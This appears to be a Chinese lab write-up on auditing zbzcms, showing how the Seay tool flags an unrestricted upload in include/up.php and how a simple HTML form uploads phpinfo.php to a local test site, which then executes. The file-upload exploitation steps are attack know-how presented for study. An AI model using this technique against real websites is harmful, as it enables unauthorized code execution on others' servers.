代码审计之文件上传漏洞实验

一、phpstudy搭建zbzcms.com网站

在这里插入图片描述

二、使用seay源代码审计工具

1.进行自动审计,发现可疑文件上传的漏洞

在这里插入图片描述

2.双击打开,分析代码,添加变量输出$_FILES在这里插入图片描述

添加代码如下:var_dump($_FILES);

3.在网站根目录下新建html文件内容如下

<html>
<head>
<meta charset="utf-8">
<title>xxx</title>
</head>
<body>

<form action="http://zbzcms:8002/cms/cms/include/up.php?run=file&path=./" method="post" enctype="multipart/form-data">
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>

</body>
</html>

此处改成自己正确的url
在这里插入图片描述

4.用浏览器访问html文件,上传phpinfo.php文件

在这里插入图片描述
返回出路径
在这里插入图片描述

5.访问路径,文件解析成功!

在这里插入图片描述

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>